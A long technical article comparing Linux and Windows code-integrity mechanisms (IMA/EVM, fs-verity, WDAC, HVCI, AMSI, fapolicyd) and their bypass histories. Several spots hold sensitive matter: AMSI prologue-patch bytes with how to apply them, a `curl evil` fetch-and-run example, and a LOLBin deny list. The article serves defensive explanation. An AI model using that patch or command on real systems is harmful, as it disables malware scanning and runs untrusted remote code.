The Merkle tree turns whole-file hashing into O(log n) verification per page read, with constant-time digest retrieval. Concretely, an APK or container layer with thousands of pages does not need a full hash on first open; the page cache verifies the leaves and intermediate Merkle nodes only for the pages actually touched. IMA can consume fs-verity's digest directly through the `digest_type=verity` modifier in its policy language.
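The O(log n) claim is easy to check concretely. The Python sketch below builds a binary Merkle tree over 4 KiB pages with `hashlib` and verifies one page against the root using only its sibling path; the leaf layout and proof format are simplified stand-ins, not fs-verity's on-disk format:

```python
import hashlib

PAGE = 4096  # illustrative leaf size

def _h(b: bytes) -> bytes:
    return hashlib.sha256(b).digest()

def build_tree(data: bytes):
    """Return (root, levels) for a binary Merkle tree over fixed-size pages."""
    level = [_h(data[i:i + PAGE]) for i in range(0, len(data), PAGE)] or [_h(b"")]
    levels = [level]
    while len(level) > 1:
        # Odd node counts pair the last node with itself.
        level = [_h(level[i] + (level[i + 1] if i + 1 < len(level) else level[i]))
                 for i in range(0, len(level), 2)]
        levels.append(level)
    return level[0], levels

def prove(levels, idx):
    """Sibling hashes from leaf idx up to the root: O(log n) nodes."""
    proof = []
    for level in levels[:-1]:
        sib = idx ^ 1
        proof.append(level[sib] if sib < len(level) else level[idx])
        idx //= 2
    return proof

def verify_page(page: bytes, idx: int, proof, root) -> bool:
    """Verify one page against the root without reading the rest of the file."""
    node = _h(page)
    for sib in proof:
        node = _h(node + sib) if idx % 2 == 0 else _h(sib + node)
        idx //= 2
    return node == root

data = bytes(range(256)) * 64            # 16 KiB -> 4 pages
root, levels = build_tree(data)
proof = prove(levels, 2)                 # proof length = log2(4) = 2
print(verify_page(data[2 * PAGE:3 * PAGE], 2, proof, root))  # True
print(len(proof))                        # 2
```

Reading one page of a 4-page file costs two hash-compares here; a file with a million pages would cost twenty, never the whole file.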

<PullQuote>
The breakthrough was not a stronger check. It was moving the check out of the attacker's address space.
</PullQuote>

Each pivot moved the trust boundary outward in a different direction. EVM moved the integrity root from "xattr next to the file" to "HMAC-keyed xattr, key sealed to TPM PCRs". HVCI moved the kernel-mode verifier from "in the kernel the attacker can patch" to "in a secure kernel the attacker cannot reach without breaking the hypervisor". IPE moved the per-access decision from "recompute a file's hash" to "look up a precomputed property". Fs-verity collapsed the per-access cost from O(n) on the file to O(log n) on a Merkle path.

The crypto was already strong. The breakthrough was the geometry of where the verifier lived.

By 2020 both stacks looked dramatically different from their 2009 and 2015 originals. Here is what each one looks like today, side by side.

## 6. The stack today, side by side

Eleven moving parts. Here is how they line up.

| Linux | Windows | Layer |
|---|---|---|
| IMA appraise + EVM | App Control (WDAC) UMCI | User-mode code integrity |
| Kernel module signing | App Control + HVCI driver enforcement | Kernel-mode code integrity |
| fs-verity + dm-verity | HVCI page-level W^X + signed catalogues | Page-level integrity |
| AppArmor / SELinux | (no direct analogue; closest is AppContainer / ASR) | Mandatory access control |
| fapolicyd | App Control + AppLocker | User-space allowlist |
| IPE | App Control (FilePath / hash rules) | Property-based code integrity |
| (no direct analogue) | AMSI | Script content scan |
| (no direct analogue) | Smart App Control + ISG | Cloud reputation |

The mapping is not 1-to-1 in either direction. Linux composes; Windows consolidates. To compare meaningfully we have to look at each layer in turn.

### 6.1 Code-integrity enforcers: IMA + EVM vs WDAC vs IPE

| Dimension | Linux IMA + EVM | WDAC (App Control) | IPE |
|---|---|---|---|
| Enforcement layer | VFS / LSM hook (file open, mmap, exec) | PE loader (kernel CI, user-mode CI) | LSM hook on `op=EXECUTE` |
| Identity primitive | File-content hash or `imasig` / `modsig` / `sigv3` | Authenticode chain, hash, FilePath, or ISG | dm-verity root hash / fs-verity digest |
| Policy expression | Procedural rules (`func=` / `mask=` / `fsmagic=`) | Signed XML compiled to binary `.p7b` | Signed plain-text DFA |
| Worst-case per-access | O(n) hash on first access; O(1) cached | O(1) cached; O(n) hash on cache miss | O(1) (properties precomputed) |
| Fail-closed mode | Yes (appraise) | Yes (enforced) | Yes |
| Remote-attestation friendly | Yes (TPM PCR 10) | Indirect (Measured Boot logs) | Indirect |
| Bypass arms race | Whole-disk swap (countered by EVM key sealing) | LOLBins (Microsoft block list + community LOLBAS) | Limited surface (DFA-only) |

The [IMA policy ABI](https://www.kernel.org/doc/Documentation/ABI/testing/ima_policy) documents the full rule grammar: `action [condition ...]` where action is one of `measure | dont_measure | appraise | dont_appraise | audit | dont_audit | hash | dont_hash`, and conditions select on `func=`, `mask=`, `fsmagic=`, `fsuuid=`, `uid=`, `fowner=`, LSM-label predicates, and the all-important `appraise_type=` modifier that names the signature scheme. [IMA template management](https://docs.kernel.org/security/IMA-templates.html) controls *what* gets recorded per measurement-list entry; the two templates used in practice today are `ima-ng` (`d-ng|n-ng`: hash-algo-prefixed digest plus name) and `ima-sigv2` (`d-ngv2|n-ng|sig`: versioned digest plus name plus signature).
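Assembled from that grammar, a minimal appraisal policy is short. The fragment below is illustrative, not a vetted production policy: the first two rules skip procfs and sysfs by their standard filesystem magic numbers, the third requires a v2 IMA signature on anything executed from ext4 (0xef53, the same magic the sigv3 example later in this article uses), and the fourth measures every exec into the measurement list:

```
dont_appraise fsmagic=0x9fa0
dont_appraise fsmagic=0x62656572
appraise func=BPRM_CHECK fsmagic=0xef53 appraise_type=imasig
measure func=BPRM_CHECK mask=MAY_EXEC
```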

WDAC's [policy rule reference](https://learn.microsoft.com/en-us/windows/security/application-security/application-control/app-control-for-business/design/select-types-of-rules-to-create) defines the rule kinds operators actually write: Publisher, PcaCertificate, LeafCertificate, FileName, Version, Hash (SHA-1, SHA-256, or SHA-384), FilePath (added in 1903 and explicitly weaker because a user with write access can substitute the file), Managed Installer, and Intelligent Security Graph. The compiled output is a signed binary `.p7b` CIPolicy.

The same doc records two defaults that surprise operators -- policies start life in audit mode, and they restrict only kernel-mode code: "We recommend that you use Enabled:Audit Mode initially because it allows you to test new App Control policies before you enforce them ... By default, only kernel-mode binaries are restricted. Enabling the following rule option validates user mode executables and scripts." The Enabled:UMCI rule option is what flips a WDAC policy from kernel-only to full user-mode enforcement.

<Mermaid caption="WDAC policy evaluation. The Authenticode chain is parsed first; rule kinds are evaluated in priority order; bypass-list deny rules are normally added as a last-stop safety net.">
flowchart LR
  PE[PE load request] --> AC[Parse Authenticode signature]
  AC --> RM[Match rule set]
  RM --> P[Publisher / cert rule?]
  P -->|hit| AL[Allow]
  P -->|miss| H[Hash rule?]
  H -->|hit| AL
  H -->|miss| FP[FilePath rule?]
  FP -->|hit| AL
  FP -->|miss| MI[Managed Installer?]
  MI -->|hit| AL
  MI -->|miss| ISG[Intelligent Security Graph?]
  ISG -->|hit| AL
  ISG -->|miss| DEF[Default action]
  AL --> BL&#123;"In bypass-list deny?"&#125;
  BL -->|yes| BLK[Block]
  BL -->|no| LOAD[Loader continues]
  DEF --> BLK
</Mermaid>

### 6.2 Mandatory access control: AppArmor vs SELinux

| Dimension | AppArmor | SELinux |
|---|---|---|
| Model | Path-based allowlist per binary | Type-enforcement on subject x object x class |
| Storage of policy state | In-memory DFA loaded from user space | `security.selinux` xattr + compiled `policy.31` |
| Granularity | Profile per executable | Per-type, per-class, per-operation |
| Survives file rename | No (path is the identity) | Yes (xattr travels with inode) |
| Default-on distros | Ubuntu, openSUSE, SLES | RHEL, Fedora, Oracle Linux, Android, ChromeOS |
| Authoring tools | `aa-genprof`, `aa-logprof`, `aa-enforce` | `audit2allow`, `semodule`, refpolicy, `udica` |

[AppArmor's kernel documentation](https://docs.kernel.org/admin-guide/LSM/apparmor.html) describes the model directly: "AppArmor is MAC style security extension for the Linux kernel. It implements a task centered policy, with task 'profiles' being created and loaded from user space." A profile reads like a rule file rather than a label algebra:

```
/usr/sbin/nginx {
  capability net_bind_service,
  /etc/nginx/** r,
  /var/log/nginx/* w,
  /var/www/** r,
  network inet stream,
}
```

The kernel compiles each profile to a DFA at load time, so policy lookup is O(L) in path length. SELinux's compiled policy uses a hash-table query against compiled type-enforcement rules with an in-memory access-vector cache for O(1) hot decisions. Both are practical; they differ on which model fits the way an administrator thinks. AppArmor wins on auditability and quick authoring; SELinux wins on expressiveness and on what the [Wikipedia summary](https://en.wikipedia.org/wiki/Security-Enhanced_Linux) calls Mandatory Access Control for multi-level security. [Smack](http://schaufler-ca.com/) is a third in-tree LSM, simpler than SELinux, used heavily by Tizen.
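The "survives file rename" row is the sharpest practical difference, and it is small enough to model. In the Python toy below the dict names and label strings are invented; the point is only that a path-keyed lookup loses its profile on rename, while an inode-attached label travels with the object:

```python
# Toy contrast of the two identity models: AppArmor keys policy on
# the path, SELinux keys it on a label stored with the inode. This
# is a schematic model, not either kernel's real data structures.

apparmor_profiles = {"/usr/sbin/nginx": "nginx-profile"}

class Inode:
    def __init__(self, label):
        self.xattrs = {"security.selinux": label}

fs = {"/usr/sbin/nginx": Inode("httpd_exec_t")}

def apparmor_lookup(path):
    return apparmor_profiles.get(path, "unconfined")

def selinux_lookup(path):
    return fs[path].xattrs["security.selinux"]

# Rename the binary: the inode (and its xattr) moves, the path does not.
fs["/usr/sbin/nginx2"] = fs.pop("/usr/sbin/nginx")

print(apparmor_lookup("/usr/sbin/nginx2"))  # unconfined: profile lost
print(selinux_lookup("/usr/sbin/nginx2"))   # httpd_exec_t: label survived
```

Neither behaviour is simply "wrong": path identity is what makes AppArmor profiles readable, and label identity is what makes SELinux policies survive file motion.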

<Aside label="fapolicyd as the userspace daemon path">
Red Hat's `fapolicyd` is the answer for operators who want App Control-style allowlisting without rebuilding the kernel. Trust is inherited from the RPM database; the daemon sits on the kernel's `fanotify` permission channel and answers ALLOW or DENY on every `open` and `exec`. Per the [RHEL hardening guide](https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/8/html/security_hardening/assembly_blocking-and-allowing-applications-using-fapolicyd_security-hardening), rule files in `/etc/fapolicyd/rules.d/` are concatenated in lexicographic order into `compiled.rules`. The Red Hat-shipped numbered prefixes are 10 (language interpreters), 20 (dracut), 21 (updaters), 30 (patterns), 40/41/42 (ELF), 70 (trusted languages), 72 (shell), 90 (deny-execute), 95 (allow-open). First-match-wins evaluation means operators adding custom rules must give their file a number lower than 90 to ensure their `allow` is reached before the catch-all deny.
</Aside>
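The lexicographic-concatenation and first-match semantics are worth internalising, because they are exactly what bites an operator who numbers a custom allow above 90. A toy Python model -- the rule syntax is heavily simplified and the file names are invented in the Red Hat numbering style:

```python
# First-match-wins over lexicographically concatenated rule files,
# as the aside describes. Rule grammar is a simplification of
# fapolicyd's, for illustration only.
rules_d = {
    "70-trusted-lang.rules": ["allow perm=execute trust=1 : all"],
    "90-deny-execute.rules": ["deny perm=execute all : all"],
    "95-allow-open.rules":   ["allow perm=open all : all"],
    # A custom allow numbered above 90 is dead code:
    "91-custom-allow.rules": ["allow perm=execute dir=/opt/app/ : all"],
}

def compile_rules(d):
    out = []
    for name in sorted(d):            # lexicographic concatenation
        out.extend(d[name])
    return out

def decide(compiled, perm, trusted, path):
    for rule in compiled:
        verdict, body = rule.split(" ", 1)
        if f"perm={perm}" not in body:
            continue
        if "trust=1" in body and not trusted:
            continue
        if "dir=" in body and not any(
                tok.split("=", 1)[1] in path
                for tok in body.split() if tok.startswith("dir=")):
            continue
        return verdict
    return "deny"

compiled = compile_rules(rules_d)
# /opt/app/run is untrusted: rule 90's catch-all deny fires before 91.
print(decide(compiled, "execute", False, "/opt/app/run"))  # deny
```

Renaming the custom file to anything below `90-` moves its allow ahead of the catch-all deny, which is precisely the renumbering discipline the aside describes.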

### 6.3 Hypervisor-anchored CI: HVCI

HVCI's runtime cost is dominated by the hypercall round-trip from VTL0 to VTL1 on driver load and on each executable-page allocation. Steady-state overhead is small on hardware with the right capabilities.

Microsoft's [HVCI documentation](https://learn.microsoft.com/en-us/windows/security/hardware-security/enable-virtualization-based-protection-of-code-integrity) names the dependency: "Memory integrity works better with Intel Kabylake and higher processors with Mode-Based Execution Control, and AMD Zen 2 and higher processors with Guest Mode Execute Trap capabilities. Older processors rely on an emulation of these features, called Restricted User Mode, and will have a bigger impact on performance." Practitioner-visible rule of thumb: less than 5 percent overhead on MBEC/GMET-capable silicon, 10 to 20 percent on kernel-bound workloads when the CPU has to emulate.

<MarginNote>HVCI hardware prerequisites per the [OEM VBS guidance](https://learn.microsoft.com/en-us/windows-hardware/design/device-experiences/oem-vbs): 64-bit CPU with virtualization extensions (VT-x or AMD-V), second-level address translation (EPT or RVI), an IOMMU (VT-d or AMD-Vi), TPM 2.0, UEFI MAT, Secure MOR v2, and ideally MBEC (Intel) or GMET (AMD).</MarginNote>

### 6.4 Script-level inspection: AMSI vs Linux's gap

| Dimension | AMSI | Linux IMA on scripts |
|---|---|---|
| What it sees | Deobfuscated script buffer at execution time | Whole-file content at `open` or `mmap` |
| Coverage | PowerShell, WSH, VBA, JScript, MSHTA, UAC installers, .NET, Edge | Any file whose `func=FILE_CHECK` rule matches |
| Provider model | COM `IAntimalwareProvider` per process | None; kernel verifies signature directly |
| Defends against runtime obfuscation | Yes (sees final buffer) | No (sees file as written) |
| Trust boundary | Wrong (in-process; patchable by attacker) | Right (kernel-side; attacker cannot patch) |

The asymmetry is the point. AMSI sees what the interpreter is about to evaluate; IMA sees only what is on disk. AMSI catches in-memory PowerShell payloads, Office macros that decode themselves at runtime, and `Invoke-Expression` evaluations that never touched the filesystem. IMA's hash is final at file write time and tells you exactly nothing about what `bash -c "$(curl evil)"` will execute.
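A ten-line sketch makes the asymmetry concrete. The file below never changes, so its at-rest digest never changes, while the buffer actually evaluated arrives at runtime; `fetch_payload` is an invented stand-in for the `curl` in the example above:

```python
import hashlib

# What IMA sees: the bytes at rest. What AMSI sees: the buffer the
# interpreter is about to evaluate. A downloader stub makes the
# difference concrete.

script_on_disk = b'eval "$(fetch https://example.invalid/payload)"'

def fetch_payload() -> bytes:
    # Stand-in for network content the attacker controls at runtime.
    return b"arbitrary attacker bytes that never touch the filesystem"

at_rest_digest = hashlib.sha256(script_on_disk).hexdigest()
evaluated_buffer = fetch_payload()

# The at-rest digest is identical whether the payload is benign or
# hostile; only a hook at evaluation time sees `evaluated_buffer`.
print(at_rest_digest == hashlib.sha256(script_on_disk).hexdigest())  # True
print(evaluated_buffer in script_on_disk)  # False
```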

<Definition term="Constrained Language Mode">
The reduced PowerShell language mode App Control forces on systems with UMCI enabled. It blocks reflection (the `[System.Reflection]` namespace), dynamic-type creation, and arbitrary .NET API calls. It is the runtime-side complement to App Control: even if a script gets in, its evaluation surface is dramatically reduced. This is also what makes the `amsiInitFailed` flag-flip bypass non-trivial under modern App Control: the reflection needed to set the flag is blocked.
</Definition>

### 6.5 Cloud reputation: Smart App Control

[Smart App Control](https://learn.microsoft.com/en-us/windows/security/application-security/application-control/app-control-for-business/appcontrol) ships as a pre-baked WDAC policy bundled with Windows 11 22H2 and later. The App Control overview describes it as the consumer-facing entry point that brings application control to home users. On every fresh install SAC starts in *evaluation* mode for 48 hours, during which Microsoft's cloud reputation service silently observes the user's app inventory; on enterprise-managed devices SAC auto-disables at the end of the window unless the user explicitly opts in.

<Aside label="Smart App Control's 48-hour evaluation window">
Three quirks operators must understand. First, evaluation lasts 48 hours and is silent. Second, enterprise-managed (Intune, AAD-joined, GPO-managed) devices auto-disable at evaluation end. Third, disable is one-way: there is no "restart evaluation" path. The intended deployment model is that enterprises use full App Control with a managed-installer policy, not SAC. Consumers with a small app footprint and no IT team get a cloud-driven allowlist for free; everyone else is expected to author a policy.
</Aside>

> **Note:** Once Smart App Control is off on a device, it can only be re-enabled by performing a clean install of Windows. A Settings > Reset This PC does not re-enable SAC. Treat enabling SAC as a deployment decision, not a casual toggle.

### 6.6 fs-verity as the per-file Merkle layer

For the data-at-rest performance story, fs-verity's `ioctl(FS_IOC_ENABLE_VERITY)` builds the Merkle tree, persists it next to the file, and switches the file to read-only. `FS_IOC_MEASURE_VERITY` returns the digest in constant time. IMA's policy language gained `appraise_type=sigv3` and the `digest_type=verity` modifier so a rule like

```
appraise func=BPRM_CHECK fsmagic=0xef53 appraise_type=sigv3 digest_type=verity
```

asks the filesystem for the file's fs-verity digest (O(1)) and verifies the kernel-stored signature over that digest, rather than re-hashing the file even on first access. Supported on ext4, f2fs, and btrfs.

Eleven mechanisms, two architectures, one shared shape: an allowlist of trusted producers plus a hook that can refuse to honour anything outside it. The allowlist of producers is the deepest common assumption, and it is also where the next class of attacks lives.

## 7. Bypass arms races

Every code-integrity system on the market is in a continuous fight with the bypass it shipped with. The fights tell you what each architecture got wrong.

### The AMSI bypass family

The three single-shot techniques from Section 4 -- prologue patch, `amsiInitFailed` flag flip, library unload -- have all been answered by partial mitigations. Microsoft has [hardened AMSI provider loading](https://learn.microsoft.com/en-us/windows/win32/amsi/antimalware-scan-interface-portal) to require Authenticode-signed provider DLLs from Windows 10 1903 onward. Defender ships ETW-based detection that flags in-memory patches to `amsi.dll`. Constrained Language Mode (forced by App Control) blocks the reflection needed to flip `AmsiUtils.amsiInitFailed`. None of these closes the structural problem. AMSI is by design a function call inside the script host. As long as the host process is the trust boundary, the attacker who reaches the host process wins.

<PullQuote>
The trust boundary is wrong: the host process making the AMSI call is the same process the attacker is running in.
</PullQuote>

<Spoiler kind="solution" label="What the canonical AMSI patch looks like in x64 assembly">
The simplest in-memory patch overwrites `AmsiScanBuffer`'s prologue with a three-byte sequence that zeroes EAX (`AMSI_RESULT_CLEAN` is 0) and returns:

```
xor eax, eax    ; 31 C0
ret             ; C3
```

or the six-byte variant that makes every call fail outright with `E_INVALIDARG`, which the fail-open script host treats as "no detection":

```
mov eax, 0x80070057   ; B8 57 00 07 80   (HRESULT E_INVALIDARG)
ret                   ; C3
```

Both variants are detected by modern Defender via ETW patch detection, but neither requires kernel privileges: a `VirtualProtect` call to make the page writable plus a write of a few bytes is enough.
</Spoiler>

### The WDAC LOLBin arms race

Microsoft's [App Control bypass list](https://learn.microsoft.com/en-us/windows/security/application-security/application-control/app-control-for-business/design/applications-that-can-bypass-appcontrol) is a maintained document that any non-trivial WDAC policy must merge into its deny rules. The 40-plus entries include `mshta.exe`, `wscript.exe`, `cscript.exe`, `msbuild.exe`, `Microsoft.Build.dll`, `windbg.exe`, `cdb.exe`, `kd.exe`, `dotnet.exe`, `csi.exe`, `rcsi.exe`, `addinprocess.exe`, `addinutil.exe`, `aspnet_compiler.exe`, `bash.exe`, `wsl.exe`, `runscripthelper.exe`, `system.management.automation.dll`, and `webclnt.dll` / `davsvc.dll`. The community [LOLBAS index](https://lolbas-project.github.io/) widens the field to roughly 200 entries with MITRE ATT&CK technique IDs.

Tooling (the WDAC Wizard, AaronLocker, Microsoft's `ConfigCI` PowerShell module, `CiTool.exe`) automates merging the deny set into a base policy and onto Intune. The asymmetry is the bottom line: trust granted at signer granularity, exploitation at binary granularity. The deny list is not a fix; it is a treadmill.
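The asymmetry reduces to a two-rule decision function. In the Python sketch below the signer name and deny entries come from the discussion above, and the deny-before-allow ordering mirrors WDAC's rule that an explicit deny wins over an allow; everything else is simplification:

```python
# The granularity asymmetry in miniature: one signer-level allow
# rule admits every binary from that signer, so each abusable
# binary needs its own deny entry -- the treadmill.

ALLOW_SIGNERS = {"Microsoft Windows Production PCA 2011"}
DENY_FILES = {"mshta.exe", "wscript.exe", "msbuild.exe", "addinutil.exe"}

def wdac_decision(signer: str, filename: str) -> str:
    if filename.lower() in DENY_FILES:
        return "BLOCK"            # binary-granular deny wins
    if signer in ALLOW_SIGNERS:
        return "ALLOW"            # signer-granular trust
    return "BLOCK"                # default deny

print(wdac_decision("Microsoft Windows Production PCA 2011", "notepad.exe"))  # ALLOW
print(wdac_decision("Microsoft Windows Production PCA 2011", "mshta.exe"))    # BLOCK
```

Every newly discovered LOLBin is a new entry in `DENY_FILES`, never a change to the allow rule: the trust grant and the exploit unit live at different granularities.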

<Definition term="LOLBin (Living-Off-the-Land Binary)">
A trusted binary, often shipped by the OS vendor and signed by the vendor's code-signing certificate, that an attacker re-purposes to bypass an allowlist or to perform actions that would be blocked if attempted with non-vendor tooling. Examples on Windows: `mshta.exe` to evaluate HTA scripts, `regsvr32.exe` to execute a remote scriptlet, `installutil.exe` to run code via a designed-for-development assembly loader.
</Definition>

### The fapolicyd permissive window

This is not a cryptographic bypass; it is the architectural choice (userspace daemon over `fanotify`) showing its operational seam. A privileged operator who sets `permissive=1` to debug a noisy rule and forgets to revert has silently disabled enforcement. If the daemon dies under load or after a bad rule deploy, the kernel waits for the fanotify response timeout and then fails open. There is no failsafe equivalent of HVCI's "the verifier is in another address space" guarantee.

### IMA / EVM offline-key attacks

EVM is only as strong as its key custody. If the HMAC key is loaded from a file on disk (the worst-case configuration), an attacker with root on a running system can read it, then perform the offline-rewrite attack of Section 4 with a valid `security.evm` HMAC. TPM-sealed keys close this path on hardware that supports sealing; some installations skip the seal step "until we add a TPM" and never do. Asymmetric (EVM portable signatures) mode avoids on-box key custody but requires a per-package signing pipeline most distributions have not built.

### The cross-stack symmetry

Both lineages obey two architectural rules, and both have at least one place where they break each rule:

| Bypass class | Linux instance | Windows instance | Root cause | Partial mitigation |
|---|---|---|---|---|
| Verifier shares address space with attacker | (script interpreters; no in-kernel interpreter scanner) | AMSI prologue patch, `amsiInitFailed` flag flip | Software-only protection of an in-process secret is impossible | ETW patch detection, signed providers, Constrained Language Mode |
| Trust grant coarser than exploit unit | RPM trust pre-fapolicyd integrity-mode addition | WDAC Publisher rules + LOLBins | Trust algebra cannot express "Microsoft except mshta" with one rule | Hash-level denies, growing block list |
| Reference value reachable by attacker | IMA without EVM | (HVCI moved the kernel verifier out of reach) | Reference value next to the file under attacker control | EVM HMAC sealed to TPM PCR |
| Verifier is killable | fapolicyd daemon failure | (HVCI verifier is hypervisor-isolated) | Verifier liveness is part of the trust assumption | TPM-sealed boot policy + kernel-mode fallback |

The first row is the most uncomfortable for both stacks. Linux does not have an AMSI-equivalent in production, so there is no in-kernel hook that sees the buffer an interpreter is about to evaluate; the boundary is not "wrong", it simply does not exist. Windows has the hook and has paid for the consequences of putting it in the wrong place for ten years. Neither result is good.

The lesson from both rows of pivots is consistent: when an architecture is forced to put the verifier somewhere reachable, treat its output as telemetry rather than control, and budget for the bypass.

These are not implementation bugs. They are structural features of the architectures, and to understand why, we have to look at what computer science says is and is not possible.

## 8. What the theory says

Three impossibility results bound everything in this article. Two are decades old; the third is a property of how modern interpreted languages execute.

### Rice's theorem

Rice's 1953 theorem says that any non-trivial semantic property of an arbitrary program is undecidable from the program text alone. Applied to malware: there is no algorithm that takes a binary as input and returns "malicious" or "benign" in finite time for every input.

Every code-integrity stack on the market therefore reduces to the same shape: an *allowlist* of producers (signers, hashes, dm-verity roots) the operator chooses to trust, plus a hook that refuses to honour anything outside the allowlist. Defender, ClamAV, the AMSI scanner -- all the things we call "malware detectors" -- are heuristic add-ons running on top of an allowlist substrate, and they are explicitly fallible. They have to be.

### No software-only protection of an in-process secret

The second result is operational, not formal, but it is no less binding. If process P holds a secret S, and process P also evaluates code C the attacker chose, then no purely software-side technique inside P can keep C from reading or rewriting S.

AMSI's design violates this: the scanner is a function call inside the script host, and the attacker is running code in the script host. HVCI's entire architecture exists to relocate the kernel-mode code-integrity verifier out of the host's address space, into a secure kernel the attacker cannot reach with normal kernel privileges. EVM's design likewise moves the integrity-defining key into a kernel keyring sealed to TPM PCRs so an offline attacker with disk access cannot reach it.

### No verification of dynamically generated executable code

The third result is the gap on both operating systems. JIT-compiled code (V8, JVM, CLR), libffi closures, and anonymous `mmap` followed by `mprotect(PROT_EXEC)` all produce executable bytes that did not exist on disk and were never hashed.

The [IPE documentation](https://docs.kernel.org/admin-guide/LSM/ipe.html) lists this as an explicit limitation: a property-based check on the file the JIT compiled does not authenticate the bytes the JIT emitted. WDAC's User-Mode Code Integrity has the same gap for managed runtimes that emit IL at runtime. There is no production answer on either side; there are only mitigations: disable JITs where possible, run them in restricted runtimes (Constrained Language Mode), block the trampolines.

<Sidenote>The JIT gap is one reason both stacks ship "Constrained Language Mode"-style restricted-runtime options. PowerShell's Constrained Language Mode blocks reflection and dynamic-type creation; the JVM's `--module-path` and module-system encapsulation play a similar role for hosted Java code; the CLR's AppContainer and the .NET Core trim modes lean the same way. None of these "verify" the JIT output; they restrict what the runtime is willing to emit.</Sidenote>

### Cryptographic bounds

The cryptographic side, by contrast, is closed.

- Any preimage-resistant hash needs $\Omega(n)$ work on the data being hashed. You cannot verify a file you do not read.
- A Merkle tree with leaf size $k$ over a file of size $n$ reduces this to $O(\log(n/k))$ per partial read. The classic Merkle 1979 construction underlies dm-verity, fs-verity, and the Android APK Signature Scheme v4. **fs-verity matches this lower bound.**
- Whole-file SHA-256 on modern x86 with SHA-NI runs at roughly $2 \text{ GB/s}$ per core; SHA-512 at $\sim 1.4 \text{ GB/s}$. A 100 MB binary verifies in roughly $50 \text{ ms}$ worst-case and $0 \text{ ms}$ cached. RSA-2048 and Ed25519 signature verification both finish in well under a millisecond on modern hardware (tens to a few hundred microseconds depending on CPU and library); verify cost is not the bottleneck.

So on the *crypto* side the gap between upper and lower bounds is closed. On the *policy-expressiveness* side there is no "best" policy, because the right policy depends on the threat model: there is no single optimum, only trade-offs along the frontier.

| Bound | What it says | Mechanism that matches it | Remaining gap |
|---|---|---|---|
| Rice's theorem | "Is this binary malicious?" is undecidable | Every CI stack is an allowlist + signer model | Allowlist composition is itself a policy problem |
| In-process secret | No purely-software defence inside the attacker's address space | HVCI moves verifier to VTL1; EVM key in keyring sealed to TPM | AMSI design violates this; the gap is structural |
| Hash verification | $\Omega(n)$ per full read; $O(\log n)$ per partial read | fs-verity per page; IMA cached on `i_iversion` | Cold-cache cost remains O(n) for non-fs-verity files |
| JIT and dynamic code | No way to verify code that did not exist on disk | None | Restricted-runtime modes (CLM, AppContainer) are the best partial answer |
| Asymmetric verify | About 60-300 µs per RSA-2048 or Ed25519 verify on modern x86 | Authenticode catalogues amortise; IMA caches in inode | Cold cache is the only sensitive case |

> **Key idea:** Crypto is closed. Policy expressiveness and trust-boundary protection are theoretically unsolvable in general. Every stack is an allowlist plus a trusted-signer model, never a malware detector. The wall is theoretical, not engineering.

If the theory says we cannot win, what is research targeting in 2026?

## 9. Open frontiers

Three problems define the 2026 research front. All are being worked on upstream. None will dissolve the theoretical bounds of Section 8.

### Linux integrity at distribution scale: the Integrity Digest Cache

IMA appraisal has a scale problem. On a general-purpose Linux distribution where every file is RPM-signed, asking IMA to verify a per-file `imasig` signature on every `open` is expensive.

Roberto Sassu (Huawei Cloud) proposed a fix as the `digest_cache` LSM in [version 3 of the patchset, posted in February 2024](https://lore.kernel.org/linux-integrity/20240209140917.846878-1-roberto.sassu@huaweicloud.com/) and covered on [LWN](https://lwn.net/Articles/961591/). The v3 cover letter is concrete: "Preliminary tests have shown a speedup of IMA appraisal of about 65% for sequential read, and 45% for parallel read." The design extracts pre-computed reference digests from vendor-signed digest lists (RPM headers, kernel TLV digest-list format, third-party formats via loadable parsers) and exposes a `digest_cache_lookup()` primitive that integrity providers (IMA, IPE, BPF LSM) call instead of verifying per-file signatures.

By v6 in [November 2024](https://lore.kernel.org/linux-integrity/20241119104922.2772571-1-roberto.sassu@huaweicloud.com/) the work had been retitled "Introduce the Integrity Digest Cache" and pivoted from a standalone LSM into an integrity-subsystem helper, in response to maintainer feedback. The v6 cover letter quantifies the baseline the design attacks: IMA measurement "introduces a noticeable overhead (up to 10x slower in a microbenchmark) on frequently used system calls, like the open()." Discussion continues on the [linux-integrity list](https://lore.kernel.org/linux-integrity/?q=digest_cache+LSM); memory safety of the TLV parser was verified with the [Frama-C](https://frama-c.com/) static analyser. As of late 2024 the work is not yet upstream.

<PullQuote>
"Preliminary tests have shown a speedup of IMA appraisal of about 65% for sequential read, and 45% for parallel read." -- Roberto Sassu, digest_cache LSM v3 cover letter, February 2024
</PullQuote>

The important framing correction: the Integrity Digest Cache is **not** a Linux AMSI equivalent. AMSI is an interpreter-side scanner of the deobfuscated, about-to-execute script buffer. The Integrity Digest Cache is a file-content digest delivery mechanism that closes the same gap IMA already closes, but more efficiently and at distribution scale. The Linux script-content gap remains genuinely open.

### Out-of-process AMSI broker

The conjectural fix on the Windows side is an out-of-process AMSI broker: every `AmsiScanBuffer` call IPCs to a service running outside the script host's address space. The in-process bypass family disappears because the attacker is no longer in the same process as the scanner. The cost is a context switch and serialisation overhead per script eval.

Microsoft has layered partial mitigations -- signed AMSI provider DLLs from 1903, ETW patch detection in Defender, Constrained Language Mode under App Control -- but no full out-of-process redesign exists. Whether it ever will is a function of how willing Microsoft is to pay the latency cost on hot PowerShell loops.
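What such a broker would look like is easy to sketch. The Python toy below is purely conjectural -- no such Windows service exists, and the scanner heuristic and pipe framing are invented -- but it demonstrates the property that matters: the verdict is computed in an address space the script host cannot patch, at the price of an IPC round-trip per buffer:

```python
import multiprocessing as mp

def broker(conn):
    # Runs in its own process; an in-host memory patch cannot reach it.
    # The substring check stands in for a real scanning engine.
    while True:
        buf = conn.recv()
        if buf is None:
            break
        verdict = "MALWARE" if b"AmsiScanBuffer-patch" in buf else "CLEAN"
        conn.send(verdict)

if __name__ == "__main__":
    host_end, broker_end = mp.Pipe()
    p = mp.Process(target=broker, args=(broker_end,))
    p.start()

    # The "script host" submits each about-to-execute buffer over IPC.
    host_end.send(b"Write-Output 'hello'")
    print(host_end.recv())  # CLEAN

    host_end.send(None)     # shut the broker down
    p.join()
```

The trade-off the text names is visible in the structure: every scan is now a `send`/`recv` pair across a process boundary, which is exactly the per-eval latency a hot PowerShell loop would pay.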

### Cross-OS attestation

A verifier validating evidence from a mixed Linux + Windows fleet today must speak two languages at once. IMA's measurement-log format (`ima_template_fmt`) and [Windows Measured Boot](/blog/measured-boot-the-tcg-event-log-from-srtm-to-pcr-bound-bitlo/)'s [WBCL](https://trustedcomputinggroup.org/resource/canonical-event-log-format/) both target TPM PCRs but encode events differently.

